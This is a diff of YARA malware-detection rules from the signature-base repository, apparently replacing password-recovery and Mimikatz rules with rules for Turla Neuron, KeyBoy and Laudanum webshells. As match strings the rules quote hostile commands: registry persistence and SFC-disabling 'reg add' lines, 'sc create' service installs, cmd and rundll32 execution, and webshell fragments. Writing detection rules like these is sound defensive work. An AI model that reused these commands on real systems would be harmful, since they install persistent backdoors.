-		$s2 = "Scan finished at" fullword ascii
-		$s3 = "Scan started at" fullword ascii
+		$x1 = "[mimikittenz.MemProcInspector]" ascii
+		$s1 = "PROCESS_ALL_ACCESS = PROCESS_TERMINATE | PROCESS_CREATE_THREAD | PROCESS_SET_SESSIONID | PROCESS_VM_OPERATION |" fullword ascii
+		$s2 = "IntPtr processHandle = MInterop.OpenProcess(MInterop.PROCESS_WM_READ | MInterop.PROCESS_QUERY_INFORMATION, false, process.Id);" fullword ascii
+		$s3 = "&email=.{1,48}&create=.{1,2}&password=.{1,22}&metadata1=" ascii
+		$s4 = "[DllImport(\"kernel32.dll\", SetLastError = true)]" fullword ascii
 
 	condition:
-		filesize < 20KB and 3 of them
+		( uint16( 0 ) == 0x7566 and filesize < 60KB and 2 of them ) or $x1
 }
-rule SIGNATURE_BASE_WPR_Loader_EXE : FILE
+rule SIGNATURE_BASE_Neuron_Common_Strings : FILE
 {
 	meta:
-		description = "Windows Password Recovery - file loader.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "97fa3efb-9e7a-52ef-9e26-3fdd573d4d30"
-		date = "2017-03-15"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3473-L3493"
+		description = "Rule for detection of Neuron based on commonly used strings"
+		author = "NCSC UK"
+		id = "168214d4-7436-531e-9c1f-48ca22215a1b"
+		date = "2017-11-23"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_neuron.yar#L9-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "26af6fe1b3dfe8e3a48c03a9f6f2033fbc909a677d35159e28b7e9b867ea5542"
+		hash = "d1d7a96fcadc137e80ad866c838502713db9cdfe59939342b8e3beacf9c7fe29"
+		logic_hash = "5f7a704fa0b6892b40868689c876e2f8252bb7319424212454408cbdf66f0b9f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e7d158d27d9c14a4f15a52ee5bf8aa411b35ad510b1b93f5e163ae7819c621e2"
 
 	strings:
-		$s1 = "Failed to get system process ID" fullword wide
-		$s2 = "gLSASS.EXE" fullword wide
-		$s3 = "WriteProcessMemory failed" fullword wide
-		$s4 = "wow64 process NOT created" fullword wide
-		$s5 = "\\ast.exe" wide
-		$s6 = "Exit code=%s, status=%d" fullword wide
-		$s7 = "VirtualProtect failed" fullword wide
-		$s8 = "nSeDebugPrivilege" fullword wide
+		$strServiceName = "MSExchangeService" ascii
+		$strReqParameter_1 = "cadataKey" wide
+		$strReqParameter_3 = "cadata" wide
+		$strReqParameter_4 = "cadataSig" wide
+		$strEmbeddedKey = "PFJTQUtleVZhbHVlPjxNb2R1bHVzPnZ3WXRKcnNRZjVTcCtWVG9Rb2xuaEVkMHVwWDFrVElFTUNTNEFnRkRCclNm clpKS0owN3BYYjh2b2FxdUtseXF2RzBJcHV0YXhDMVRYazRoeFNrdEpzbHljU3RFaHBUc1l4OVBEcURabVVZVklVb HlwSFN1K3ljWUJWVFdubTZmN0JTNW1pYnM0UWhMZElRbnl1ajFMQyt6TUhwZ0xmdEc2b1d5b0hyd1ZNaz08L01vZH VsdXM+PEV4cG9uZW50PkFRQUI8L0V4cG9uZW50PjwvUlNBS2V5VmFsdWU+" wide
+		$strDefaultKey = "8d963325-01b8-4671-8e82-d0904275ab06" wide
+		$strIdentifier = "MSXEWS" wide
+		$strListenEndpoint = "443/ews/exchange/" wide
+		$strB64RegKeySubstring = "U09GVFdBUkVcTWljcm9zb2Z0XENyeXB0b2dyYXBo" wide
+		$strName = "neuron_service" ascii
+		$dotnetMagic = "BSJB" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $dotnetMagic and 6 of ( $str* )
 }
-rule SIGNATURE_BASE_WPR_Loader_DLL : FILE
+rule SIGNATURE_BASE_Nautilus_Forensic_Artificats
 {
 	meta:
-		description = "Windows Password Recovery - file loader64.dll"
+		description = "Rule for detection of Nautilus related strings"
+		author = "NCSC UK / Florian Roth"
+		id = "0c0a24da-4dbc-543a-9ec0-a5b1ec75c889"
+		date = "2017-11-23"
+		modified = "2023-12-05"
+		reference = "https://www.ncsc.gov.uk/alerts/turla-group-malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_neuron.yar#L98-L125"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "17ae559a4640636f1285c7078a4366954d5a41c098419db32315e354f0ae619d"
+		score = 60
+		quality = 85
+		tags = ""
+
+	strings:
+		$ = "App_Web_juvjerf3.dll" fullword ascii
+		$ = "App_Web_vcplrg8q.dll" fullword ascii
+		$ = "ar_all2.txt" fullword ascii
+		$ = "ar_sa.txt" fullword ascii
+		$ = "Convert.FromBase64String(temp[1])" fullword ascii
+		$ = "D68gq#5p0(3Ndsk!" fullword ascii
+		$ = "dcomnetsrv" fullword ascii
+		$ = "ERRORF~1.ASP" fullword ascii
+		$ = "intelliAdminRpc" fullword ascii
+		$ = "J8fs4F4rnP7nFl#f" fullword ascii
+		$ = "Msnb.exe" fullword ascii
+		$ = "nautilus-service.dll"
+		$ = "Neuron_service" fullword ascii
+		$ = "owa_ar2.bat" fullword ascii
+		$ = "payload.x64.dll.system" fullword ascii
+		$ = "service.x64.dll.system" fullword ascii
+
+	condition:
+		1 of them
+}
+
+rule SIGNATURE_BASE_Keyboys_Malware_1 : FILE
+{
+	meta:
+		description = "Detects Keyboys malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d3102ab6-0473-544b-b9dd-ec7a18ae1c4b"
-		date = "2017-03-15"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3495-L3528"
+		id = "4e334f62-6ffc-55c3-bcbe-ff4a80fb007d"
+		date = "2017-11-02"
+		modified = "2023-12-05"
+		reference = "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L13-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "015334828007e954d1e910e6377b37bade99df2ce86152901ec4ded8c71975de"
+		logic_hash = "78fb48c4b3e09f0d55ca6049601ea62dd526167481725b48de6624bb27fb943b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7b074cb99d45fc258e0324759ee970467e0f325e5d72c0b046c4142edc6776f6"
-		hash2 = "a1f27f7fd0e03601a11b66d17cfacb202eacf34f94de3c4e9d9d39ea8d1a2612"
+		hash1 = "1d716cee0f318ee14d7c3b946a4626a1afe6bb47f69668065e00e099be362e22"
+		hash2 = "a6e9951583073ab2598680b17b8b99bab280d6dca86906243bafaf3febdf1565"
+		hash3 = "34f740e5d845710ede1d942560f503e117600bcc7c5c17e03c09bfc66556196c"
+		hash4 = "750f4a9ae44438bf053ffb344b959000ea624d1964306e4b3806250f4de94bc8"
+		hash5 = "fc84856814307a475300d2a44e8d15635dedd02dc09a088a47d1db03bc309925"
+		hash6 = "0f9a7efcd3a2b1441834dae7b43cd8d48b4fc1daeb2c081f908ac5a1369de753"
 
 	strings:
-		$x1 = "loader64.dll" fullword ascii
-		$x2 = "loader.dll" fullword ascii
-		$s1 = "TUlDUk9TT0ZUX0FVVEhFTlRJQ0FUSU9OX1BBQ0tBR0VfVjFfMA==" fullword ascii
-		$s2 = "UmVtb3RlRGVza3RvcEhlbHBBc3Npc3RhbnRBY2NvdW50" fullword ascii
-		$s3 = "U2FtSVJldHJpZXZlUHJpbWFyeUNyZWRlbnRpYWxz" fullword ascii
-		$s4 = "VFM6SW50ZXJuZXRDb25uZWN0b3JQc3dk" fullword ascii
-		$s5 = "TCRVRUFjdG9yQWx0Q3JlZFByaXZhdGVLZXk=" fullword ascii
-		$s6 = "YXNwbmV0X1dQX1BBU1NXT1JE" fullword ascii
-		$s7 = "TCRBTk1fQ1JFREVOVElBTFM=" fullword ascii
-		$s8 = "RGVmYXVsdFBhc3N3b3Jk" fullword ascii
-		$op0 = { 48 8b cd e8 e0 e8 ff ff 48 89 07 48 85 c0 74 72 }
-		$op1 = { e8 ba 23 00 00 33 c9 ff 15 3e 82 }
-		$op2 = { 48 83 c4 28 e9 bc 55 ff ff 48 8d 0d 4d a7 00 00 }
+		$x1 = "reg add HKLM\\%s\\Parameters /v ServiceDll /t REG_EXPAND_SZ /d \"%s\" /f" fullword ascii
+		$x3 = "Internet using \\svchost.exe -k  -n 3" fullword ascii
+		$x4 = "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v SFCDisable /t REG_DWORD /d 4 /f" fullword ascii
+		$s1 = "sc create %s binpath= \"%s\" Type= share Start= auto DisplayName= \"%s\"" fullword ascii
+		$s2 = "ExecCmd:%s" fullword ascii
+		$s3 = "szCommand : %s" fullword ascii
+		$s4 = "Current user is a member of the %s\\%s group" fullword ascii
+		$s5 = "icacls %s /grant administrators:F" fullword ascii
+		$s6 = "Ping 127.0.0.1 goto Repeat" fullword ascii
+		$s7 = "Start MoveFile %s -> %s" fullword ascii
+		$s8 = "move %s\\dllcache%s %s\\dllcache\\%s" fullword ascii
+		$s9 = "%s\\cmd.exe /c \"%s\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $s* ) and all of ( $op* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "68f7eced34c46808756db4b0c45fb589" or ( pe.exports ( "Insys" ) and pe.exports ( "Inuser" ) and pe.exports ( "SSSS" ) ) or 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_WPR_Passscape_Loader : FILE
+rule SIGNATURE_BASE_Keyboy_Installclient : FILE
 {
 	meta:
-		description = "Windows Password Recovery - file ast.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d8e224ce-edd2-5e2d-9b6e-a8995f5d2c1c"
-		date = "2017-03-15"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3530-L3548"
+		description = "Detects KeyBoy InstallClient"
+		author = "Markus Neis, Florian Roth"
+		id = "d1359f35-d6cd-502b-8cf7-6215bf5e62ba"
+		date = "2018-03-26"
+		modified = "2023-12-05"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L52-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "79b1a3ed1ea0d9a3ddee0b8557393318a8baf4812110a6ed03a7106b8096b31e"
+		logic_hash = "701b87785562dc391191b1e59573c6027b27c4fffe1c9155a82114521c85bc59"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f6f2d4b9f19f9311ec419f05224a1c17cf2449f2027cb7738294479eea56e9cb"
+		hash1 = "85d32cb3ae046a38254b953a00b37bb87047ec435edb0ce359a867447ee30f8b"
+		hash2 = "b0f120b11f727f197353bc2c98d606ed08a06f14a1c012d3db6fe0a812df528a"
+		hash1 = "d65f809f7684b28a6fa2d9397582f350318027999be3acf1241ff44d4df36a3a"
 
 	strings:
-		$s1 = "SYSTEM\\CurrentControlSet\\Services\\PasscapeLoader64" fullword wide
-		$s2 = "ast64.dll" fullword ascii
-		$s3 = "\\loader64.exe" wide
-		$s4 = "Passcape 64-bit Loader Service" fullword wide
-		$s5 = "PasscapeLoader64" fullword wide
-		$s6 = "ast64 {msg1GkjN7Sh8sg2Al7ker63f}" fullword wide
+		$x1 = "egsvr32.exe \"/u bitsadmin /canceft\\windows\\currebitsadmin" ascii
+		$x2 = "/addfibitsadmin /Resumbitsadmin /SetNosoftware\\microsotifyCmdLine " ascii
+		$x3 = "D:\\Work\\Project\\VS\\house\\Apple\\" ascii
+		$x4 = "Bj+I11T6z9HFMG5Z5FMT/u62z9zw8FyWV0xrcK7HcYXkiqnAy5tc/iJuKtwM8CT3sFNuQu8xDZQGSR6D8/Bc/Dpuz8gMJFz+IrYqNAzwuPIitg==" fullword ascii
+		$x5 = "szCmd1:%s" fullword ascii
+		$s1 = "cmd.exe /c \"%s\"" fullword ascii
+		$s4 = "rundll32.exe %s Main" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_WPR_Asterisk_Hook_Library : FILE
+rule SIGNATURE_BASE_Keyboy_Wab32Res : FILE
 {
 	meta:
-		description = "Windows Password Recovery - file ast64.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "03c20c9d-bb8f-53f6-9cb5-9b059fb24949"
-		date = "2017-03-15"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3550-L3572"
+		description = "Detects KeyBoy Loader wab32res.dll"
+		author = "Markus Neis, Florian Roth"
+		id = "0e4045a7-1c45-5043-9e10-e969219b67f8"
+		date = "2018-03-26"
+		modified = "2023-12-05"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L75-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6bb75cb8c3ba18a34f4651532060154608c78e6f748148226da4416ad1171124"
+		logic_hash = "5e23bfeed0587ac69527234dd3f8b4f8c5628128ab667af7b99c4d75ca99459b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "225071140e170a46da0e57ce51f0838f4be00c8f14e9922c6123bee4dffde743"
-		hash2 = "95ec84dc709af990073495082d30309c42d175c40bd65cad267e6f103852a02d"
+		hash1 = "02281e26e89b61d84e2df66a0eeb729c5babd94607b1422505cd388843dd5456"
+		hash2 = "fb9c9cbf6925de8c7b6ce8e7a8d5290e628be0b82a58f3e968426c0f734f38f6"
 
 	strings:
-		$s1 = "ast64.dll" fullword ascii
-		$s2 = "ast.dll" fullword wide
-		$s3 = "c:\\%s.lvc" fullword ascii
-		$s4 = "c:\\%d.lvc" fullword ascii
-		$s5 = "Asterisk Hook Library" fullword wide
-		$s6 = "?Ast_StartRd64@@YAXXZ" fullword ascii
-		$s7 = "Global\\{1374821A-281B-9AF4-%04X-12345678901234}" fullword ascii
-		$s8 = "2004-2013 Passcape Software" fullword wide
-		$s9 = "Global\\Passcape#6712%04X" fullword ascii
+		$x1 = "B4490-2314-55C1- /Processid:{321bitsadmin /canceft\\windows\\curresoftware\\microso" fullword ascii
+		$x2 = "D:\\Work\\VS\\House\\TSSL\\TSSL\\TClient" ascii
+		$x3 = "\\Release\\FakeRun.pdb" ascii
+		$x4 = "FakeRun.dll" fullword ascii
+		$s1 = "cmd.exe /c \"%s\"" fullword ascii
+		$s2 = "CreateProcess failed (%d)" fullword ascii
+		$s3 = "CreateProcess %s " fullword ascii
+		$s4 = "FindResource %s error " fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_WPR_Windowspasswordrecovery_EXE : FILE
+
+rule SIGNATURE_BASE_Keyboy_Rasauto : FILE
 {
 	meta:
-		description = "Windows Password Recovery - file wpr.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7fa2062c-75dd-55aa-8775-631a9c1a497e"
-		date = "2017-03-15"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3574-L3603"
+		description = "Detects KeyBoy ServiceClient"
+		author = "Markus Neis, Florian Roth"
+		id = "b6c72a91-fda1-5f40-804f-896b25a8813f"
+		date = "2018-03-26"
+		modified = "2023-12-05"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L98-L126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f2995a8ba1644d384167221560aa0c3f074e8e2cf2b79bbb06537fcaed2df7f"
+		logic_hash = "87529000522d5fad4346a0228c96d3adf122587d91b0cff083948787e53cc024"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c1c64cba5c8e14a1ab8e9dd28828d036581584e66ed111455d6b4737fb807783"
+		hash1 = "49df4fec76a0ffaee5e4d933a734126c1a7b32d1c9cb5ab22a868e8bfc653245"
 
 	strings:
-		$x1 = "UuPipe" fullword ascii
-		$x2 = "dbadllgl" fullword ascii
-		$x3 = "UkVHSVNUUlkgTU9O" fullword ascii
-		$x4 = "RklMRSBNT05JVE9SIC0gU1l" fullword ascii
-		$s1 = "WPR.exe" fullword wide
-		$s2 = "Windows Password Recovery" fullword wide
-		$op0 = { 5f df 27 17 89 }
-		$op1 = { 5f 00 00 f2 e5 cb 97 }
-		$op2 = { e8 ed 00 f0 cc e4 00 a0 17 }
+		$x1 = "rundll32.exe %s SSSS & exit" fullword ascii
+		$x2 = "D:\\Work\\Project\\VS\\HSSL\\HSSL_Unicode _2\\Release\\ServiceClient.pdb" fullword ascii
+		$s1 = "cmd.exe /c \"%s\"" fullword ascii
+		$s2 = "CreateProcess failed (%d)" fullword ascii
+		$s3 = "ServiceClient.dll" fullword ascii
+		$s4 = "NtWow64QueryInformationProcess64 failed" fullword ascii
+		$s5 = "pid:%d CmdLine:%S" fullword ascii
+		$s6 = "rasauto32.ServiceMain" fullword ascii
+		$s7 = "del /q/f %s\\%s*" fullword ascii
+		$s8 = "szTmpDll:%s" fullword ascii
+		$s9 = "lpCmdLine:%s" fullword ascii
+		$s0 = "ReleaseFileFromRes:%s ok!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20000KB and ( 1 of ( $x* ) or all of ( $s* ) or all of ( $op* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.exports ( "SSSS" ) or 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_WPR_Windowspasswordrecovery_EXE_64 : FILE
+rule SIGNATURE_BASE_Keyboy_876_0X4E20000 : FILE
 {
 	meta:
-		description = "Windows Password Recovery - file ast64.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0f6c7695-e616-5757-b9cd-8cff5f972c3e"
-		date = "2017-03-15"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3605-L3622"
+		description = "Detects KeyBoy Backdoor"
+		author = "Markus Neis, Florian Roth"
+		id = "0b871f62-0f7c-5c94-9b3d-f68832ab64b4"
+		date = "2018-03-26"
+		modified = "2023-12-05"
+		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_keyboys.yar#L128-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6cdd46609d401b7c12b936de7f64bab0bc45b9d2c6079fae45a96f5be6857b82"
+		logic_hash = "092bb19cd7a4250560ea71a3e54780a8fd34a229caa294e4cd5b6d522850d519"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4e1ea81443b34248c092b35708b9a19e43a1ecbdefe4b5180d347a6c8638d055"
+		hash1 = "6e900e5b6dc4f21a004c5b5908c81f055db0d7026b3c5e105708586f85d3e334"
 
 	strings:
-		$s1 = "%B %d %Y  -  %H:%M:%S" fullword wide
-		$op0 = { 48 8d 8c 24 50 22 00 00 e8 bf eb ff ff 4c 8b c7 }
-		$op1 = { ff 15 16 25 01 00 f7 d8 1b }
-		$op2 = { e8 c2 26 00 00 83 20 00 83 c8 ff 48 8b 5c 24 30 }
+		$x1 = "%s\\rundll32.exe %s ServiceTake %s %s" fullword ascii
+		$x2 = "#%sCmd shell is not running,or your cmd is error!" fullword ascii
+		$x3 = "Take Screen Error,May no user login!" fullword ascii
+		$x4 = "Get logon user fail!" fullword ascii
+		$x5 = "8. LoginPasswd:%s" fullword ascii
+		$x6 = "Take Screen Error,service dll not exists" fullword ascii
+		$s1 = "taskkill /f /pid %s" fullword ascii
+		$s2 = "TClient.exe" fullword ascii
+		$s3 = "%s\\wab32res.dll" fullword ascii
+		$s4 = "%s\\rasauto.dll" fullword ascii
+		$s5 = "Download file:%s index:%d" fullword ascii
+		$s6 = "LogonUser: [%s]" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Beyondexec_Remoteaccess_Tool : FILE
+rule SIGNATURE_BASE_Asp_File : FILE
 {
 	meta:
-		description = "Detects BeyondExec Remote Access Tool - file rexesvr.exe"
+		description = "Laudanum Injector Tools - file file.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd68cb45-a46f-53d7-bf52-8f7bd3636d0d"
-		date = "2017-03-17"
-		modified = "2025-04-14"
-		reference = "https://goo.gl/BvYurS"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3634-L3652"
+		id = "e2a80d1f-f2bb-573b-b68c-71e4dfa6e1fa"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L8-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6f21ddf04ab0d29549c3d07a45afb3e7648a15b0c81f88b8d7ccccc436ba4084"
+		hash = "ff5b1a9598735440bdbaa768b524c639e22f53c5"
+		logic_hash = "9ec19a994571f4d1b40b6d6af3fb6eb4c5004a6439b99863b50dae0262677263"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d3e3f0708479d951ab72fa04ac63acc7e5a75a5723eb690b34301580747032c"
 
 	strings:
-		$x1 = "\\BeyondExecV2\\Server\\Release\\Pipes.pdb" ascii
-		$x2 = "\\\\.\\pipe\\beyondexec%d-stdin" fullword ascii
-		$x3 = "Failed to create dispatch pipe. Do you have another instance running?" fullword ascii
-		$op1 = { 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 80 6f 40 }
-		$op2 = { 6a 40 33 c0 59 bf e0 d8 40 00 f3 ab 8d 0c 52 c1 }
+		$s1 = "' *** Written by Tim Medin <tim@counterhack.com>" fullword ascii
+		$s2 = "Response.BinaryWrite(stream.Read)" fullword ascii
+		$s3 = "Response.Write(Response.Status & Request.ServerVariables(\"REMOTE_ADDR\"))" fullword ascii
+		$s4 = "%><a href=\"<%=Request.ServerVariables(\"URL\")%>\">web root</a><br/><%" fullword ascii
+		$s5 = "set folder = fso.GetFolder(path)" fullword ascii
+		$s6 = "Set file = fso.GetFile(filepath)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or all of ( $op* ) ) ) or ( 3 of them )
+		uint16( 0 ) == 0x253c and filesize < 30KB and 5 of them
 }
-rule SIGNATURE_BASE_Mimikatz_Gen_Strings : FILE
+rule SIGNATURE_BASE_Php_Killnc : FILE
 {
 	meta:
-		description = "Detects Mimikatz by using some special strings"
+		description = "Laudanum Injector Tools - file killnc.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f4ab5d7-5a9f-55f0-9dda-e2975df582a0"
-		date = "2017-06-19"
-		modified = "2025-04-14"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3654-L3676"
+		id = "241611d3-3636-5a25-b3c3-d45d6cb81c78"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "371e74538a63cfe355ebd31e1ac73cd25e92f3a7ce3f9299e0f3406f2bcb5b01"
+		hash = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
+		logic_hash = "431a9a66f5d0e42856ca5716c2994c018f77cc338300abd71d94ffe7e75da3bf"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "058cc8b3e4e4055f3be460332a62eb4cbef41e3a7832aceb8119fd99fea771c4"
-		hash2 = "eefd4c038afa0e80cf6521c69644e286df08c0883f94245902383f50feac0f85"
-		hash3 = "f35b589c1cc1c98c4c4a5123fd217bdf0d987c00d2561992cbfb94bd75920159"
 
 	strings:
-		$s1 = "[*] '%s' service already started" fullword wide
-		$s2 = "** Security Callback! **" fullword wide
-		$s3 = "Try to export a software CA to a crypto (virtual)hardware" fullword wide
-		$s4 = "enterpriseadmin" fullword wide
-		$s5 = "Ask debug privilege" fullword wide
-		$s6 = "Injected =)" fullword wide
-		$s7 = "** SAM ACCOUNT **" fullword wide
+		$s1 = "if ($_SERVER[\"REMOTE_ADDR\"] == $IP)" fullword ascii
+		$s2 = "header(\"HTTP/1.0 404 Not Found\");" fullword ascii
+		$s3 = "<?php echo exec('killall nc');?>" fullword ascii
+		$s4 = "<title>Laudanum Kill nc</title>" fullword ascii
+		$s5 = "foreach ($allowedIPs as $IP) {" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
+		filesize < 15KB and 4 of them
 }
-rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Lpe : FILE
+rule SIGNATURE_BASE_Asp_Shell : FILE
 {
 	meta:
-		description = "Detects POC code from disclosed 0day hacktool set"
+		description = "Laudanum Injector Tools - file shell.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d3693d1d-6085-5e62-8f0b-dde5b14758b7"
-		date = "2017-07-07"
-		modified = "2025-04-14"
-		reference = "Disclosed 0day Repos"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L3688-L3709"
+		id = "3ae27254-325a-5358-b5aa-ab24b43ad5a6"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_laudanum_webshells.yar#L47-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "77d72792d7fcf2c54b36d124448e928f306981296715e583d346ccd101e22fc7"
+		hash = "8bf1ff6f8edd45e3102be5f8a1fe030752f45613"
+		logic_hash = "af9c5cf7125e1210761e720c5f30527ac6345b5029b087807309000a29b67f6e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e10ee278f4c86d6ee1bd93a7ed71d4d59c0279381b00eb6153aedfb3a679c0b5"
